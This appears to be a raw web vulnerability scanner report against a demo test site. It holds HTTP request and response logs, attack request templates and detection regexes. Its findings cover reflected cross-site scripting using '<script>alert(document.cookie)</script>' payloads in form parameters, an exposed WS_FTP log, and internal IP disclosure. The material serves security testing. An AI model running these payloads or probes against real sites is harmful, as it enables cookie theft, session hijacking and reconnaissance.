<li>If a link brought you to this Web page, contact that Web site's administrator.</li>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script> home page, and then look for links to the information you want.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> Homepage();</script> home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP Error 500-15 - Requests for global.asa not allowed<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=500.15&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=test@<script>alert(document.cookie)</script>.com&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>test@<script>alert(document.cookie)</script>.com</attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /join.asp?name=test@<script>alert(document.cookie)</script>.com&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>test@<script>alert(document.cookie)</script>.com</attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /images/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:10 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (images)<B>Found Directory:</B> /images/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /admin/WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:31 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:54:02 GMT
ETag: "623ab4b05158c11:8f6"
Content-Length: 4940
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
WS_FTP Log (ws_ftp.log)WS_FTP is a popular FTP client for Windows. Many system administrators and developers use it to upload and download files from web servers. When WS_FTP either uploads or downloads files, it leaves a file called 'ws_ftp.log' in every directory that is accessed on the server. This file contains records of every file that is accessed by WS_FTP. This is very valuable information to an attacker because it may list files that are otherwise "hidden." This often includes administrative or maintainence applications, web application configuration files, applications-in-development, backed-up application source code and possible application data files.GET /admin/<attack>WS_FTP.LOG</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /admin/WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:31 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:54:02 GMT
ETag: "623ab4b05158c11:8f6"
Content-Length: 4940
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
Internal IP DisclosureA string matching an internal IP address was discovered. This discloses information about the IP addressing scheme of the internal network and can be valuable to attackers.
